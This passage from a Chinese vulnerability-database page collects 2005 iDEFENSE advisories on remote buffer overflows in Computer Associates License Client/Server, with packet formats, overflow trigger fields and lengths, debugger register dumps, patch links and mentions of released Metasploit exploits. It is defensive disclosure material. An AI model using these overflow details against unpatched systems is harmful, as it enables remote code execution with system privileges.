License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates License Server and License Client can allow attackers to 
execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied values in GCR requests. The GCR request 
packet format is shown below:

A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English> 
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown> 
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0> 
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201> 
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>

If the IP address, hostname, or netmask contain large values, the stack 
overflow can be triggered.

Ollydbg output after SEH overwrite in CA License Server:

EAX 00630210 
ECX 7C91056D ntdll.7C91056D 
EDX 003B0608 
EBX 00E4E053 ASCII "GCR" 
ESP 00E2FC7C ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
EBP 00E4E050 ASCII "A0" 
ESI 00E2FD28 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
EDI 00E4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011 
EIP DEADC0DE

SEH chain of thread 00000DA4, item 0 
Address=00E2FFA4 
SE handler=58585858

Log data, item 0 
Address=DEADC0DE 
Message=Access violation when executing [DEADC0DE]

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under 
the privileges of Local System. A GETCONFIG packet exchange which 
discloses the remote operating system version usually proceeds the GCR 
request and increases the likelihood of successful exploitation. The CA 
License Server does not run by default, but is packaged with most 
Computer Associates software distributions. The CA License Client does 
run by default and is packaged with almost all Computer Associates 
software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. 

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports. 

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#a
lp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

12/01/2004  Initial vendor notification
12/01/2004  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this 
vulnerability.

Get paid for vulnerability research 
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert 
electronically. It may not be edited in any way without the express 
written consent of iDEFENSE. If you wish to reprint the whole or any 
part of this alert in any other medium other than electronically, 
please email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS 
condition. There are no warranties with regard to this information. 
Neither the author nor the publisher accepts any liability for any 
direct, indirect, or consequential loss or damage arising from use of, 
or reliance on, this information.

    

- 漏洞信息 (F36432)

iDEFENSE Security Advisory 2005-03-02.4 (PacketStormID:F36432)
2005-03-03 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-0581
[点击下载]

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates License Server and License Client can allow attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient bounds checking on user-supplied values in GETCONFIG requests.

Computer Associates License Client/Server GETCONFIG Buffer Overflow 

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=213&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates License Server and License Client can allow attackers to 
execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied values in GETCONFIG requests. Under normal 
operation, the License Server will send a GETCONFIG request to 
connecting clients and clients may optionally respond with a similar 
GETCONFIG packet. Both the client and server software fail to check 
bounds on the last parameter of the GETCONFIG packet which results in a 
stack overflow as shown below. 

Ollydbg output after SEH overwrite in CA License Server:

EAX 00000001
ECX 7C90FB71 ntdll.7C90FB71
EDX 0000000D
EBX 00E4E053 ASCII "GETCONFIG"
ESP 00E2FC9C
EBP 00E4E050 ASCII "A0"
ESI 00E2FD18
EDI 00E4E05D ASCII "SELF"
EIP DEADC0DE

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under 
the privileges of Local System. The GETCONFIG packet also contains the 
remote operating system's version information, which increases the 
likelihood of successful exploitation. The CA License Server does not 
run by default, but is packaged with most Computer Associates software 
distributions. The CA License Client does run by default and is 
packaged with almost all Computer Associates software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. 

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports. 

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#a
lp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

12/01/2004  Initial vendor notification
12/01/2004  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this 
vulnerability.

Get paid for vulnerability research 
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert 
electronically. It may not be edited in any way without the express 
written consent of iDEFENSE. If you wish to reprint the whole or any 
part of this alert in any other medium other than electronically, 
please email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS 
condition. There are no warranties with regard to this information. 
Neither the author nor the publisher accepts any liability for any 
direct, indirect, or consequential loss or damage arising from use of, 
or reliance on, this information.

    

- 漏洞信息 (F36429)

iDEFENSE Security Advisory 2005-03-02.1 (PacketStormID:F36429)
2005-03-03 00:00:00
iDefense Labs,Greg MacManus  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-0581
[点击下载]

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates International Inc. License Server and License Client can allow attackers to execute arbitrary code. iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License Client 0.1.0.15 are vulnerable. It is suspected that most CA products are running vulnerable versions of the client and/or server.

Computer Associates License Client and Server Invalid Command Buffer
Overflow

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=210&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates International Inc. License Server and License Client can 
allow attackers to execute arbitrary code.

The vulnerability specifically exists because of insufficient bounds 
checking on user-supplied values in requests with an invalid format. 
When a packet containing an overly long string which is not a valid 
command is received, the server uses that string to generate a log 
message without checking if the buffer that the message is being stored
in is large  enough. By sending a string over 2100 bytes long, it is
possible to  overwrite the saved instruction pointer, allowing execution
of arbitrary code.

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under the
privileges of Local System (on Windows platforms) or root (on Linux 
platforms). The CA License Server does not run by default, but is 
packaged with most Computer Associates software distributions. The CA 
License Client does run by default and is packaged with almost all CA 
software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. It is suspected that most CA products 
are running vulnerable versions of the client and/or server.

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports.

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#a
lp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

02/08/2005  Initial vendor notification
02/09/2005  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Greg MacManus, iDEFENSE Labs.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

14320
CA License Server/Client GCR Checksum Multiple Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in License Manager. The program fails to validate GCR Checksum packets resulting in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-03-02 2004-12-01
Unknow 2005-03-02

- 解决方案

Upgrade to version CA License 1.61.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Computer Associates License Application Multiple Vulnerabilities
Unknown 12705
Yes No
2005-03-02 12:00:00 2009-07-12 10:56:00
Greg MacManus discovered the directory traversal and some of the buffer overflow vulnerabilities. Discovery of several of the memory corruption issues is credited to Barnaby Jack. An anonymous researcher is credited with the discovery of the other issues.

- 受影响的程序版本

Computer Associates License 1.61.8
Computer Associates License 1.61.2
Computer Associates License 1.61.1
Computer Associates License 1.61
Computer Associates License 1.60.3
Computer Associates License 1.60.2
Computer Associates License 1.60
Computer Associates License 1.57
Computer Associates License 1.56
Computer Associates License 1.55
Computer Associates License 1.54
Computer Associates License 1.53
Computer Associates License 1.0.15
Computer Associates License 1.61.9

- 不受影响的程序版本

Computer Associates License 1.61.9

- 漏洞讨论

Computer Associates License client and server applications are reported prone to multiple vulnerabilities. These issues include various buffer overflow vulnerabilities in the client and server and a directory traversal vulnerability in the client. A remote attacker may execute arbitrary code and place files in arbitrary locations on a vulnerable computer.

It should be noted that the affected application runs with SYSTEM privileges on Microsoft Windows Platforms and superuser privileges on UNIX platforms; this will allow for a complete compromise of the affected computer.

**Update: Additional vulnerabilities are reported to affect the 'LIC98RMT.EXE' component of the Computer Associates License application.

Computer Associates License application versions 1.53 to 1.61.8 on all supported platforms are affected by these vulnerabilities.

- 漏洞利用

The directory traversal vulnerability does not require an exploit.

Two exploits (calicserv_getconfig.pm and calicclnt_getconfig.pm) as part of the Metasploit Framework have been released. These exploits target the GETCONFIG request buffer overflow vulnerability in the client and server.

The exploit 'CALicenseBOExplClass101.cpp' has been released for the buffer overflow in the client application.

- 解决方案

The vendor has released License version 1.61.9 to address these issues on supported platforms. Customers may follow the instructions provided at the following location to determine if they are using an affected version:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

It should be noted that users that had previously implemented any of the affected Computer Associates applications, including evaluation versions, may be vulnerable as well. It is recommended that such users implement eEye's free vulnerability scanner to verify if they are vulnerable. The scanner can be found at the following URI:

http://www.eeye.com/html/resources/downloads/audits/index.html


Computer Associates License 1.0.15

Computer Associates License 1.53

Computer Associates License 1.61.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站